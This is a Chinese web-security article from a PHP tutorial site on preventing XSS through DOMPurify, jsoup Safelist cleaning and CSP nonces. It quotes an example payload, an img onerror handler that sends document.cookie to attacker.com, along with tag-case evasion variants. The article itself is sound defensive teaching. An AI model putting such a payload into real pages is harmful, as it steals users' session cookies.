讲师中心 微信公众号
AI工具推荐 视频效率加速

预防因HTML代码质量导致的安全漏洞实战指南

风静酱_3575

风静酱_3575

发布时间:2026-07-11 12:09:25

|

824人浏览过

|

来源于php中文网

原创

直接 innerHTML 渲染用户输入是高危操作,因浏览器会无条件执行其中的 script、onerror、javascript: 等恶意代码,导致 XSS 攻击窃取 Cookie;需用 textContent 或 DOMPurify 等方案净化,服务端须用 jsoup 而非字符串替换,并配合 CSP nonce 机制。

预防因html代码质量导致的安全漏洞实战指南

为什么直接 innerHTML 渲染用户输入就是高危操作

因为浏览器会无条件执行其中的 script、onerror、javascript: 等内容,哪怕只有一处没过滤,攻击者就能用 <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)> 窃取会话凭证。

常见错误现象包括:评论区出现弹窗、后台管理页被注入远程脚本、富文本编辑器保存后页面异常跳转。

  • 不等于“用了 Vue/React 就安全”——若绕过框架的 v-html 或 dangerouslySetInnerHTML,照样触发 XSS
  • 后端返回 JSON 再前端拼接 HTML(如 el.innerHTML = data.html)等同于裸奔
  • 用 textContent 替代 innerHTML 是最廉价有效的兜底方案,但会丢失所有格式

DOMPurify 是什么,以及它为什么比手写正则靠谱

DOMPurify 不是简单地删掉 script 标签,而是完整解析 DOM 树,逐节点校验标签名、属性名、属性值协议(如 href 是否以 https: 开头)、事件处理器是否存在,再重建安全 DOM。手写正则根本无法处理嵌套、注释绕过、Unicode 变体等攻击手法。

典型使用场景:论坛评论、CMS 富文本字段、用户可自定义的仪表盘组件。

立即学习“前端免费学习笔记(深入)”;

html-deploy
html-deploy

使用 htmlcode.fun 将 HTML 内容或文件部署到网页,适用于用户要求“部署到网页”“托管此 HTML”“生成此前端...的实时链接”等场景。

下载
  • 默认配置已禁用 script、iframe、所有 on* 属性、javascript: 和 data: 协议
  • 白名单必须显式声明:DOMPurify.sanitize(dirty, {ALLOWED_TAGS: ['p','a','img'], ALLOWED_ATTR: ['href','src','class']})
  • 不要信任 FORBID_TAGS 这类黑名单模式——漏掉一个新标签(比如 base)就可能被利用

服务端 HTML 净化必须用 jsoup 而不是字符串替换

Java 项目里用 String.replace() 或正则删 <script> 是无效防御。攻击者早准备好 <ScRiPt>、<script//>、<img/onerror=...> 等变体,字符串层面根本识别不完。

jsoup 的 Cleaner 类基于真实 HTML 解析器,能归一化大小写、展开实体、剥离注释和非法嵌套,再按 Safelist 白名单裁剪。

  • 生产环境推荐 Safelist.basicWithImages() 起步,而非 Safelist.relaxed() ——后者允许 table、style,易被用于构造 CSS 注入
  • 对 href 和 src 必须限制协议:safelist.addProtocols("a", "href", "https", "http"),否则 javascript:alert(1) 仍能执行
  • 别忽略 text 字段的二次净化——有些字段虽标为“纯文本”,但若前端用 innerHTML 渲染,一样危险

CSP 头不能只靠 meta 标签,且必须配合 nonce

<meta http-equiv="Content-Security-Policy" content="..."> 在很多现代浏览器中已被忽略或降级处理,必须由服务端响应头 Content-Security-Policy 发送才生效。

仅设 default-src 'self' 不够——攻击者仍可通过内联事件(onclick)或 eval 绕过;必须启用 nonce 机制,让合法脚本带上一次性令牌。

  • 示例响应头:Content-Security-Policy: default-src 'none'; script-src 'nonce-abc123' 'strict-dynamic'; img-src https: data:; style-src 'unsafe-inline'
  • 前端脚本需带 nonce="abc123" 属性,服务端每次响应生成新 nonce 值并注入模板
  • 禁止使用 'unsafe-inline' 和 'unsafe-eval'——它们会让所有内联脚本、setTimeout("...")、new Function(...) 全部复活

真正麻烦的从来不是加一行代码,而是确认每个渲染路径是否都经过净化、每个动态插入点是否受 CSP 约束、每个第三方 SDK 是否悄悄引入了不兼容的脚本加载方式。

相关文章

HTML速学教程(入门课程)
HTML速学教程(入门课程)

HTML怎么学习?HTML怎么入门?HTML在哪学?HTML怎么学才快?不用担心,这里为大家提供了HTML速学教程(入门课程),有需要的小伙伴保存下载就能学习啦!

下载

相关标签:

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热门AI工具

更多
WorkBuddy

一款AI办公效率工具,主要用于腾讯云推出的AI原生桌面智能体工作台,适合需要提升相关任务效率的用户。

豆包大模型

豆包大模型是一款由字节跳动推出的企业级大语言模型服务平台。

音述AI
音述AI Hot

一款AI音频处理工具,主要用于音述AI是一个以“用声音述说故事”为核心的 AI 音乐创作与声音分享社区,适合需要提升相关任务效率的用户。

PixTV
PixTV Hot

PixTV是一款面向AIGC内容创作的AI视频生成工具。

Laper
Laper Hot

Laper是专为编剧、导演和制片人推出的 AI 原生剧本创作工具。

Loomy
Loomy Hot

一款AI工具,主要用于科大讯飞发布的桌面级 AI 助理,比 OpenClaw 更易用、更安全!,适合需要提升相关任务效率的用户。

立刻MV
立刻MV Hot

立刻MV是一款AI文本写作工具,AI 音乐视频(MV)创作工具。

切问学术

切问学术是一款AI论文写作工具,复旦大学NLP团队推出的AI学术智能体。

DeepSeek

DeepSeek是一款面向对话、写作、编程和推理场景的AI大模型工具。

相关专题

更多
html版权符号
html版权符号

html版权符号是“©”,可以在html源文件中直接输入或者从word中复制粘贴过来,php中文网还为大家带来html的相关下载资源、相关课程以及相关文章等内容,供大家免费下载使用。

5295

2023.06.14

html在线编辑器
html在线编辑器

html在线编辑器是用于在线编辑的工具,编辑的内容是基于HTML的文档。它经常被应用于留言板留言、论坛发贴、Blog编写日志或等需要用户输入普通HTML的地方,是Web应用的常用模块之一。php中文网为大家带来了html在线编辑器的相关教程、以及相关文章等内容,供大家免费下载使用。

3052

2023.06.21

html网页制作
html网页制作

html网页制作是指使用超文本标记语言来设计和创建网页的过程,html是一种标记语言,它使用标记来描述文档结构和语义,并定义了网页中的各种元素和内容的呈现方式。本专题为大家提供html网页制作的相关的文章、下载、课程内容,供大家免费下载体验。

2710

2023.07.31

html空格
html空格

html空格是一种用于在网页中添加间隔和对齐文本的特殊字符,被用于在网页中插入额外的空间,以改变元素之间的排列和对齐方式。本专题为大家提供html空格的相关的文章、下载、课程内容,供大家免费下载体验。

2759

2023.08.01

html是什么
html是什么

HTML是一种标准标记语言,用于创建和呈现网页的结构和内容,是互联网发展的基石,为网页开发提供了丰富的功能和灵活性。本专题为大家提供html相关的各种文章、以及下载和课程。

4659

2023.08.11

html字体大小怎么设置
html字体大小怎么设置

在网页设计中,字体大小的选择是至关重要的。合理的字体大小不仅可以提升网页的可读性,还能够影响用户对网页整体布局的感知。php中文网将介绍一些常用的方法和技巧,帮助您在HTML中设置合适的字体大小。

2701

2023.08.11

html转txt
html转txt

html转txt的方法有使用文本编辑器、使用在线转换工具和使用Python编程。本专题为大家提供html转txt相关的文章、下载、课程内容,供大家免费下载体验。

2489

2023.08.31

html文本框代码怎么写
html文本框代码怎么写

html文本框代码:1、单行文本框【<input type="text" style="height:..;width:..;" />】;2、多行文本框【textarea style=";height:;"></textare】。

2268

2023.09.01

LLVM自定义Pass怎么写
LLVM自定义Pass怎么写

本专题聚焦LLVM自定义Pass开发,整理Pass类结构、run()方法、PreservedAnalyses、CMake构建、插件注册、-load-pass-plugin加载和测试用例编写流程。

0

2026.09.30

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
Web前端入门基础教程
Web前端入门基础教程

共251课时 | 96.3万人学习

Go语言教程-全程干货无废话
Go语言教程-全程干货无废话

共100课时 | 17.6万人学习

GDB 17.2 官方文档集合
GDB 17.2 官方文档集合

共0课时 | 0人学习

关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号
PHP中文网订阅号
每天精选资源文章推送

Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn